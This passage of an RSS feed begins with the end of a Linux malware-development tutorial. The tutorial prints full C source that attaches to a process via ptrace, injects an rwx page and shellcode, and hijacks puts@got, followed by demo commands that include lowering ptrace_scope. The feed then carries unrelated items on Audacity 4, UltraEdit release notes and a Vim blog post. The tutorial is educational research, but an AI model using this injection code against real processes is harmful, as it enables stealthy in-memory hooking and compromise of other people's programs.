}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Full source code of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hack.c&lt;/code&gt;:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;/*
 * hack.c
 * GOT/PLT hijacking: attaches to a running process via ptrace,
 * injects an rwx page, writes hook shellcode, overwrites puts@got
 * author: @cocomelonc
 * https://cocomelonc.github.io/linux/2026/06/17/linux-hacking-11.html
 */
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;
#include &amp;lt;fcntl.h&amp;gt;
#include &amp;lt;elf.h&amp;gt;
#include &amp;lt;sys/ptrace.h&amp;gt;
#include &amp;lt;sys/types.h&amp;gt;
#include &amp;lt;sys/wait.h&amp;gt;
#include &amp;lt;sys/user.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;

/*
 * hook shellcode: write(1, &amp;quot;[HOOKED] meow\n&amp;quot;, 14) + ret
 * the string is appended at the end, addressed via rip-relative lea
 *
 * layout:
 *   0x00  mov rax, 1           (7 bytes)
 *   0x07  mov rdi, 1           (7 bytes)
 *   0x0e  lea rsi, [rip+0x0a]  (7 bytes, RIP after = 0x15)
 *   0x15  mov rdx, 14          (7 bytes)
 *   0x1c  syscall              (2 bytes)
 *   0x1e  ret                  (1 byte)
 *   0x1f  &amp;quot;[HOOKED] meow\n&amp;quot;    (14 bytes)
 */
static unsigned char hook_sc[] = {
  0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00,
  0x48, 0xc7, 0xc7, 0x01, 0x00, 0x00, 0x00,
  0x48, 0x8d, 0x35, 0x0a, 0x00, 0x00, 0x00,
  0x48, 0xc7, 0xc2, 0x0e, 0x00, 0x00, 0x00,
  0x0f, 0x05,
  0xc3,
  &amp;#39;[&amp;#39;,&amp;#39;H&amp;#39;,&amp;#39;O&amp;#39;,&amp;#39;O&amp;#39;,&amp;#39;K&amp;#39;,&amp;#39;E&amp;#39;,&amp;#39;D&amp;#39;,&amp;#39;]&amp;#39;,&amp;#39; &amp;#39;,&amp;#39;m&amp;#39;,&amp;#39;e&amp;#39;,&amp;#39;o&amp;#39;,&amp;#39;w&amp;#39;,&amp;#39;\n&amp;#39;
};

/* write len bytes of data into the tracee at addr, 8 bytes at a time */
static void poke_bytes(pid_t pid, uint64_t addr, void *data, size_t len) {
  size_t i;
  for (i = 0; i + 8 &amp;lt;= len; i += 8) {
    uint64_t word;
    memcpy(&amp;amp;word, (uint8_t *)data + i, 8);
    ptrace(PTRACE_POKEDATA, pid, addr + i, word);
  }
  if (i &amp;lt; len) {
    /* read-modify-write for the last partial chunk */
    uint64_t word = ptrace(PTRACE_PEEKDATA, pid, addr + i, NULL);
    memcpy(&amp;amp;word, (uint8_t *)data + i, len - i);
    ptrace(PTRACE_POKEDATA, pid, addr + i, word);
  }
}

/*
 * inject a mmap(NULL,4096,PROT_RWX,MAP_PRIVATE|MAP_ANON,-1,0) syscall
 * into the tracee by patching two bytes at RIP to 0f 05 (syscall),
 * single-stepping, then restoring registers and the original instruction
 */
static uint64_t inject_mmap(pid_t pid) {
  struct user_regs_struct regs, saved;
  uint64_t saved_instr;

  ptrace(PTRACE_GETREGS, pid, NULL, &amp;amp;saved);
  regs = saved;

  saved_instr = ptrace(PTRACE_PEEKTEXT, pid, saved.rip, NULL);
  ptrace(PTRACE_POKETEXT, pid, saved.rip,
       (saved_instr &amp;amp; ~(uint64_t)0xffff) | 0x050f);

  regs.rax = 9;
  regs.rdi = 0;
  regs.rsi = 4096;
  regs.rdx = 7;
  regs.r10 = 0x22;
  regs.r8  = (uint64_t)-1;
  regs.r9  = 0;
  ptrace(PTRACE_SETREGS, pid, NULL, &amp;amp;regs);

  ptrace(PTRACE_SINGLESTEP, pid, NULL, NULL);
  waitpid(pid, NULL, 0);

  ptrace(PTRACE_GETREGS, pid, NULL, &amp;amp;regs);
  uint64_t page = regs.rax;

  ptrace(PTRACE_POKETEXT, pid, saved.rip, saved_instr);
  ptrace(PTRACE_SETREGS, pid, NULL, &amp;amp;saved);

  return page;
}

/* parse /proc/&amp;lt;pid&amp;gt;/exe and return the virtual address of puts@got */
static uint64_t find_puts_got(pid_t pid) {
  char path[64];
  snprintf(path, sizeof(path), &amp;quot;/proc/%d/exe&amp;quot;, pid);
  int fd = open(path, O_RDONLY);
  if (fd &amp;lt; 0) { perror(&amp;quot;open exe&amp;quot;); return 0; }

  uint8_t *buf = NULL;
  size_t sz = 0;
  uint8_t tmp[4096];
  ssize_t n;
  while ((n = read(fd, tmp, sizeof(tmp))) &amp;gt; 0) {
    buf = realloc(buf, sz + n);
    memcpy(buf + sz, tmp, n);
    sz += n;
  }
  close(fd);

  Elf64_Ehdr *ehdr   = (Elf64_Ehdr *)buf;
  Elf64_Shdr *shdrs  = (Elf64_Shdr *)(buf + ehdr-&amp;gt;e_shoff);
  char *shstrtab   = (char *)(buf + shdrs[ehdr-&amp;gt;e_shstrndx].sh_offset);

  Elf64_Shdr *rela_plt = NULL, *dynsym_s = NULL, *dynstr_s = NULL;
  for (int i = 0; i &amp;lt; ehdr-&amp;gt;e_shnum; i++) {
    char *name = shstrtab + shdrs[i].sh_name;
    if (!strcmp(name, &amp;quot;.rela.plt&amp;quot;)) rela_plt = &amp;amp;shdrs[i];
    if (!strcmp(name, &amp;quot;.dynsym&amp;quot;))   dynsym_s  = &amp;amp;shdrs[i];
    if (!strcmp(name, &amp;quot;.dynstr&amp;quot;))   dynstr_s  = &amp;amp;shdrs[i];
  }

  if (!rela_plt || !dynsym_s || !dynstr_s) {
    fprintf(stderr, &amp;quot;required ELF sections not found\n&amp;quot;);
    free(buf); return 0;
  }

  Elf64_Rela *relas  = (Elf64_Rela *)(buf + rela_plt-&amp;gt;sh_offset);
  int     count  = rela_plt-&amp;gt;sh_size / sizeof(Elf64_Rela);
  Elf64_Sym  *syms   = (Elf64_Sym  *)(buf + dynsym_s-&amp;gt;sh_offset);
  char     *strtab = (char     *)(buf + dynstr_s-&amp;gt;sh_offset);

  uint64_t addr = 0;
  for (int i = 0; i &amp;lt; count; i++) {
    uint32_t idx = ELF64_R_SYM(relas[i].r_info);
    if (!strcmp(strtab + syms[idx].st_name, &amp;quot;puts&amp;quot;)) {
      addr = relas[i].r_offset;
      break;
    }
  }

  free(buf);
  return addr;
}

int main(int argc, char *argv[]) {
  if (argc &amp;lt; 2) {
    fprintf(stderr, &amp;quot;usage: %s &amp;lt;pid&amp;gt;\n&amp;quot;, argv[0]);
    return 1;
  }
  pid_t pid = (pid_t)atoi(argv[1]);

  printf(&amp;quot;attaching to pid %d...\n&amp;quot;, pid);
  if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) &amp;lt; 0) {
    perror(&amp;quot;ptrace attach&amp;quot;); return 1;
  }
  waitpid(pid, NULL, 0);
  printf(&amp;quot;attached\n&amp;quot;);

  uint64_t got_puts = find_puts_got(pid);
  if (!got_puts) {
    fprintf(stderr, &amp;quot;puts@got not found\n&amp;quot;);
    ptrace(PTRACE_DETACH, pid, NULL, NULL); return 1;
  }
  printf(&amp;quot;puts@got: 0x%lx\n&amp;quot;, got_puts);

  printf(&amp;quot;injecting mmap syscall...\n&amp;quot;);
  uint64_t page = inject_mmap(pid);
  if ((int64_t)page &amp;lt; 0) {
    fprintf(stderr, &amp;quot;mmap failed\n&amp;quot;);
    ptrace(PTRACE_DETACH, pid, NULL, NULL); return 1;
  }
  printf(&amp;quot;rwx page allocated: 0x%lx\n&amp;quot;, page);

  printf(&amp;quot;writing hook shellcode...\n&amp;quot;);
  poke_bytes(pid, page, hook_sc, sizeof(hook_sc));
  printf(&amp;quot;%zu bytes written\n&amp;quot;, sizeof(hook_sc));

  printf(&amp;quot;overwriting puts@got...\n&amp;quot;);
  ptrace(PTRACE_POKEDATA, pid, got_puts, page);
  printf(&amp;quot;puts@got -&amp;gt; 0x%lx\n&amp;quot;, page);

  ptrace(PTRACE_DETACH, pid, NULL, NULL);
  printf(&amp;quot;detached. victim is now hooked!\n&amp;quot;);
  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h3&gt;demo&lt;/h3&gt;&lt;p&gt;First, compile the victim with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-no-pie&lt;/code&gt; (fixed addresses make the GOT entry address absolute, exactly what &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.rela.plt&lt;/code&gt; stores) and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-z norelro&lt;/code&gt; (keeps the GOT writable):&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;gcc -no-pie -z norelro -o meow meow.c&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&quot;https://cocomelonc.github.io/assets/images/206/2026-06-17_07-23.png&quot; alt=&quot;malware&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;Run it in a first terminal and note the PID it prints:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;./meow&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&quot;https://cocomelonc.github.io/assets/images/206/2026-06-17_07-24_1.png&quot; alt=&quot;malware&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;Compile the hijacker:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;gcc -o hack hack.c&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&quot;https://cocomelonc.github.io/assets/images/206/2026-06-17_07-24.png&quot; alt=&quot;malware&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;On systems where the Yama LSM restricts ptrace (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ptrace_scope&lt;/code&gt; set to 1 or higher), attaching to a process that is not your own child requires either root or relaxing the scope. Setting it to 0 loosens the restriction system-wide, so restore the previous value after the demo:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&quot;https://cocomelonc.github.io/assets/images/206/2026-06-17_07-23_1.png&quot; alt=&quot;malware&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;Now run the hijacker in a second terminal, passing the victim’s PID:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;./hack &amp;lt;pid&amp;gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&quot;https://cocomelonc.github.io/assets/images/206/2026-06-17_07-27.png&quot; alt=&quot;malware&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;Switch back to the first terminal. The victim is still running and its loop carries on (it was only paused briefly while we were attached), but every &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;puts(&amp;quot;meow&amp;quot;)&lt;/code&gt; now calls our hook shellcode:&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://cocomelonc.github.io/assets/images/206/2026-06-17_07-25.png&quot; alt=&quot;malware&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;We can also check the result on disk and at runtime. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;readelf&lt;/code&gt; shows the relocation entry for &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;puts&lt;/code&gt;, whose offset is the GOT slot address we patched, and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/proc/&amp;lt;pid&amp;gt;/maps&lt;/code&gt; shows the new rwx page. To read the live GOT entry itself, attach &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;gdb&lt;/code&gt; to the victim and examine that address:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;# on disk: the relocation entry for puts (its offset is the GOT slot address)
readelf -r meow | grep puts&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&quot;https://cocomelonc.github.io/assets/images/206/2026-06-17_07-30.png&quot; alt=&quot;malware&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;# at runtime: the anonymous rwx mapping that holds the hook shellcode
cat /proc/&amp;lt;pid&amp;gt;/maps | grep rwxp&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;img src=&quot;https://cocomelonc.github.io/assets/images/206/2026-06-17_07-35.png&quot; alt=&quot;malware&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;It works perfectly!&lt;/p&gt;&lt;h3&gt;why this matters&lt;/h3&gt;&lt;p&gt;This technique is a foundational primitive in Linux offensive tooling. The hook itself needs no file on disk (the shellcode lives in anonymous memory), leaves a minimal footprint, and persists for as long as the target process is running. Real-world malware families such as &lt;a href=&quot;https://malpedia.caad.fkie.fraunhofer.de/details/elf.winnti&quot;&gt;Winnti&lt;/a&gt; abuse similar in-memory patching approaches to intercept calls and hide activity.&lt;/p&gt;&lt;p&gt;From a defensive perspective, GOT integrity can be monitored with tools that compare the runtime GOT entries against the expected libc addresses.&lt;/p&gt;&lt;p&gt;I hope this post with practical examples is useful for malware researchers, Linux programmers, and everyone who is interested in Linux hacking techniques.&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://cocomelonc.github.io/linux/2026/03/12/linux-hacking-10.html&quot;&gt;Linux hacking part 10: Shared library injection and hijacking. Simple C examples&lt;/a&gt;  &lt;br/&gt;
&lt;a href=&quot;https://cocomelonc.github.io/linux/2024/11/22/linux-hacking-3.html&quot;&gt;Linux malware development 3: linux process injection with ptrace. Simple C example&lt;/a&gt;  &lt;br/&gt;
&lt;a href=&quot;https://malpedia.caad.fkie.fraunhofer.de/details/elf.winnti&quot;&gt;Winnti&lt;/a&gt;  &lt;br/&gt;
&lt;a href=&quot;https://github.com/cocomelonc/meow/tree/master/2026-06-17-linux-hacking-11&quot;&gt;source code in github&lt;/a&gt;&lt;/p&gt;&lt;blockquote&gt;
  &lt;p&gt;This is a practical case for educational purposes only.&lt;/p&gt;
&lt;/blockquote&gt;&lt;p&gt;Thanks for your time, happy hacking, and goodbye!
&lt;em&gt;PS. All drawings and screenshots are mine&lt;/em&gt;&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Audacity 4 beta</title>
<link>https://manualdousuario.net/audacity-4-beta-download/</link>
<guid isPermaLink="false">Z7apL8La2nZjODqLdFI4hkHCZL8F2BeDObIaMg==</guid>
<pubDate>Fri, 19 Jun 2026 18:17:58 +0000</pubDate>
<description>The Audacity 4 beta is now available: a new version, with a new look and a new icon, of the long-standing FOSS audio editor (Linux, macOS, and Windows).</description>
<content:encoded>&lt;p&gt;The &lt;a href=&quot;https://www.audacityteam.org/next/&quot;&gt;Audacity 4 beta&lt;/a&gt; is now available: a new version, with a new look and a new icon, of the long-standing FOSS audio editor (Linux, macOS, and Windows). Back up projects made in version 3.x: they open in Audacity 4, but changes saved in it (or new projects created in it) are not backward compatible with Audacity 3.x, &lt;a href=&quot;https://www.omgubuntu.co.uk/2026/06/audacity-4-0-beta&quot;&gt;according to &lt;cite&gt;Omg! Ubuntu&lt;/cite&gt;&lt;/a&gt;.&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Lower CPU usage, better stability, and smoother editing: What’s new in UltraEdit 2025.0 for macOS</title>
<link>https://www.ultraedit.com/blog/new-release-ultraedit-2025-0-macos-linux/</link>
<guid isPermaLink="false">bsBtiL-90rM0wp959NOvkkFNYKsWkUWljMYVWA==</guid>
<pubDate>Fri, 19 Jun 2026 18:07:24 +0000</pubDate>
<description>We know our macOS users have been waiting for more attention on these platforms. UltraEdit for Windows has traditionally been the most mature version of the product, and we know there is still work to do to bring the macOS experience closer to that level. UltraEdit 2025.0 for macOS is an important step in that […] The post Lower CPU usage, better stability, and smoother editing: What’s new in UltraEdit 2025.0 for macOS appeared first on UltraEdit.</description>
<content:encoded>&lt;p&gt;&lt;span&gt;We know our macOS users have been waiting for more attention on these platforms. &lt;/span&gt;&lt;span&gt;&lt;a href=&quot;https://www.ultraedit.com/blog/new-release-ultraedit-2026-0-ultraeditstudio-2026-0/&quot;&gt;UltraEdit for Windows&lt;/a&gt; has traditionally been the most mature version of the product, and we know there is still work to do to bring the macOS experience closer to that level.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;UltraEdit 2025.0 for macOS is an important step in that direction.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;This release is focused on stability, reliability, performance, and the core editing experience. You’ll find lower CPU usage in specific editing scenarios, fewer interruptions, better handling of multi-file workflows, improved terminal compatibility, more predictable search and replace behavior, and a range of UI and platform-specific refinements. &lt;/span&gt;&lt;span&gt;It is not the final step. But it is a meaningful one.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;Let’s take a closer look at what’s new in UltraEdit 2025.0 for macOS.&lt;/span&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h2&gt;&lt;b&gt;Better stability and lower CPU usage&lt;/b&gt;&lt;/h2&gt;&lt;p&gt;&lt;span&gt;One of the biggest areas of improvement in UltraEdit 2025.0 is stability.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;This release includes fixes for repeated crashes while editing on macOS, crashes when modifying settings, crashes related to wordfile paths, and startup crashes with certain configurations.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;We also addressed a hang that could lead to 100% CPU usage while editing. 
In affected scenarios, &lt;strong&gt;CPU usage has been reduced by at least 50%&lt;/strong&gt;, helping UltraEdit feel more stable and responsive during longer editing sessions.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://www.ultraedit.com/wp-content/uploads/2026/05/Frame-3.png&quot; alt=&quot;&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;This release also improves behavior around multi-file workflows, including a hang that could happen when working with multiple open files, invoking New Window, and closing windows.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;If you use UltraEdit for larger editing sessions, longer-running work, or multiple open files, these improvements should make the experience feel smoother and more dependable.&lt;/span&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h2&gt;&lt;b&gt;Smoother everyday editing behavior&lt;/b&gt;&lt;/h2&gt;&lt;p&gt;&lt;span&gt;UltraEdit 2025.0 also includes several improvements to the core editing experience on macOS.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;These are the kinds of updates that make daily work feel more predictable: how navigation behaves, how selections work, how files are detected, how dialogs respond, and how UltraEdit handles specific characters and editing modes.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;This release includes improvements such as:&lt;/span&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;ul&gt;&lt;li&gt;&lt;span&gt;Better arrow key navigation at file boundaries while editing&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Improved detection of files that are already open&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Improved behavior when replacing “En space” characters in ASCII and hex mode&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Improved undo behavior in hex mode&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Improved Replace All behavior for umlauted characters in UTF-8 files&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Improved regular expression behavior where “Perl” 
was sometimes not shown as an option&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Improved double-click selection behavior for quoted strings and strings containing &lt;/span&gt;&lt;span&gt;$&lt;/span&gt;&lt;span&gt; and &lt;/span&gt;&lt;span&gt;&amp;gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Improved behavior when switching from hex mode back to normal edit mode&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Fixed a spelling issue in the Hex Find/Replace dialog&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;span&gt;Together, these changes help make UltraEdit feel more consistent across the editing workflows you use every day.&lt;/span&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h2&gt;&lt;b&gt;Better file tabs and multi-file workflows&lt;/b&gt;&lt;/h2&gt;&lt;p&gt;&lt;span&gt;This release also improves how UltraEdit behaves when working with multiple files and tabs.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;If you often keep many files open at once, you’ll notice improvements around tab sorting, multiline tabs, file detection, and unexpected tab behavior.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;UltraEdit 2025.0 adds &lt;/span&gt;&lt;b&gt;Sort File Tabs&lt;/b&gt;&lt;span&gt; to the list of commands that can be added to the toolbar, giving you quicker access to tab organization.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;It also includes fixes for:&lt;/span&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;ul&gt;&lt;li&gt;&lt;span&gt;Multiline tabs behaving unexpectedly when a new file forces a second row of tabs&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Screen splits appearing unexpectedly when clicking one of several open file tabs&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Blank edit files being created unexpectedly after clicking through the tab bar row&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Favorite Files dialog sizing and resizing behavior&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;UltraEdit creating Edit files in the user’s home directory 
when it should not&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;UltraEdit appending &lt;/span&gt;&lt;span&gt;.s&lt;/span&gt;&lt;span&gt; to newly created files saved with a &lt;/span&gt;&lt;span&gt;.sql&lt;/span&gt;&lt;span&gt; extension&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;span&gt;The goal is to make multi-file work feel cleaner, especially when your editing session starts to grow.&lt;/span&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h2&gt;&lt;b&gt;More flexible commands, toolbars, and project files&lt;/b&gt;&lt;/h2&gt;&lt;p&gt;&lt;span&gt;UltraEdit 2025.0 adds a few useful workflow improvements for users who customize their setup or move between systems.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;On macOS, you can now move custom toolbars above the edit window, giving you more flexibility in how your workspace is arranged.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;This release also adds support for specifying line and column position from the command line, which is useful when opening files directly at a specific location.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;Project files are now more portable, too. They can be created on one system and moved to another more easily, helping users who work across machines or environments.&lt;/span&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h2&gt;&lt;b&gt;JSON, live preview, and markdown refinements&lt;/b&gt;&lt;/h2&gt;&lt;p&gt;&lt;span&gt;UltraEdit 2025.0 also improves several content-specific editing workflows.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;You can now use &lt;/span&gt;&lt;b&gt;Reformat JSON&lt;/b&gt;&lt;span&gt; and &lt;/span&gt;&lt;b&gt;Compress JSON&lt;/b&gt;&lt;span&gt; on files even when JSON syntax highlighting has not been applied. 
This makes JSON cleanup easier when working with files that contain JSON-like content but are not formally detected or highlighted as JSON.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;For markdown users, this release includes improvements to bold text highlighting and live preview behavior, including cases where live preview did not display content as expected or rendered incorrectly after adding and saving a blank line.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;These updates help make UltraEdit more dependable for structured content, documentation, markdown files, and JSON cleanup.&lt;/span&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h2&gt;&lt;b&gt;macOS-specific improvements&lt;/b&gt;&lt;/h2&gt;&lt;p&gt;&lt;span&gt;UltraEdit 2025.0 includes several refinements specifically for macOS users.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;The release adds support for macOS dictation and transcription, making it easier to use system-level input features inside UltraEdit.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;It also improves several macOS application behavior issues, including:&lt;/span&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;ul&gt;&lt;li&gt;&lt;span&gt;UltraEdit not coming to the foreground when its icon is clicked in the menu bar&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;UltraEdit not remembering the desktop it is assigned to&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;UltraEdit not adjusting size when Mission Control is invoked&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Crashes when modifying settings on macOS&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span&gt;Support for moving custom toolbars above the edit window&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;span&gt;These changes are part of making UltraEdit feel more natural and reliable on macOS.&lt;/span&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h2&gt;&lt;b&gt;An important step for macOS&lt;/b&gt;&lt;/h2&gt;&lt;p&gt;&lt;span&gt;UltraEdit 2025.0 for macOS is focused on the things that matter most for 
these platforms right now: stability, reliability, performance, and smoother everyday editing. &lt;/span&gt;&lt;span&gt;We know there is still work to do. This release does not close every gap between Windows and macOS, but it does represent a clear step forward.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;With lower CPU usage in affected scenarios, improved editing stability, better multi-file behavior, stronger terminal compatibility, more predictable search and replace behavior, and platform-specific refinements for macOS, UltraEdit 2025.0 gives you a more dependable experience across both platforms. &lt;/span&gt;&lt;span&gt;And it is just the beginning of our renewed focus on making UltraEdit better across every operating system you use.&lt;/span&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;&lt;h2&gt;&lt;b&gt;Download UltraEdit 2025.0 for macOS&lt;/b&gt;&lt;/h2&gt;&lt;p&gt;&lt;span&gt;UltraEdit 2025.0 for macOS is available now.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span&gt;Update today to get the latest stability, performance, editing, terminal, toolbar, and platform-specific improvements.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://www.ultraedit.com/downloads/uex-download/&quot;&gt;&lt;b&gt;Download UltraEdit 2025.0 for macOS&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;The post &lt;a href=&quot;https://www.ultraedit.com/blog/new-release-ultraedit-2025-0-macos-linux/&quot;&gt;Lower CPU usage, better stability, and smoother editing: What’s new in UltraEdit 2025.0 for macOS&lt;/a&gt; appeared first on &lt;a href=&quot;https://www.ultraedit.com&quot;&gt;UltraEdit&lt;/a&gt;.&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Vim Carnival Entry: &quot;The Motion that Changed Everything.&quot;</title>
<link>https://rldane.space/vim-carnival-entry-the-motion-that-changed-everything.html</link>
<guid isPermaLink="false">y8BTQGBud9i-B8z41hZlotRXz5qq5igGDIAwKQ==</guid>
<pubDate>Fri, 19 Jun 2026 13:02:39 +0000</pubDate>
<description>Vim Carnival Entry: &quot;The Motion that Changed Everything.&quot;</description>
<content:encoded>&lt;header&gt;
        &lt;h3&gt;&lt;a href=&quot;https://rldane.space/vim-carnival-entry-the-motion-that-changed-everything.html&quot;&gt;Vim Carnival Entry: &amp;quot;The Motion that Changed Everything.&amp;quot;&lt;/a&gt;&lt;/h3&gt;
    &lt;/header&gt;&lt;h6&gt;Tue 02 June 2026
&lt;/h6&gt;&lt;p&gt;&lt;a href=&quot;https://rldane.space/on-the-fediverse-and-fedifriends.html&quot;&gt;Fedifriend&lt;/a&gt; and fellow vim-addict &lt;a href=&quot;https://lazybea.rs/&quot;&gt;Hyde&lt;/a&gt; is hosting what&amp;#39;s called a &amp;quot;&lt;a href=&quot;https://lazybea.rs/carnivals/&quot;&gt;Vim Carnival&lt;/a&gt;&amp;quot;, where someone sets a topic and encourages others to blog about the subject at hand concerning &lt;a href=&quot;https://en.wikipedia.org/wiki/Vim_(text_editor)&quot;&gt;vim&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;With permission, I&amp;#39;m going to slightly modify the subject to apply to nvi, but the option I will explain also works in vim.&lt;/p&gt;&lt;p&gt;First, a little background (read: ADHD oversplaining go BRRRR!)...&lt;/p&gt;&lt;h3&gt;Background&lt;/h3&gt;&lt;p&gt;I&amp;#39;ve been using vi and vi-inspired text editors for over a quarter century. I think I probably first tried it on a &lt;a href=&quot;https://en.wikipedia.org/wiki/VT320&quot;&gt;VT320&lt;/a&gt;, couldn&amp;#39;t figure out how to quit, and never wanted to try it again 😄. Then, either in 1998, when taking a class on Unix Shell programming, or in 2000 (when I switched my personal laptop over to Linux full-time for the first time) I decided to sit down and properly learn vi/vim, and managed to learn the basics well enough to get around, though not 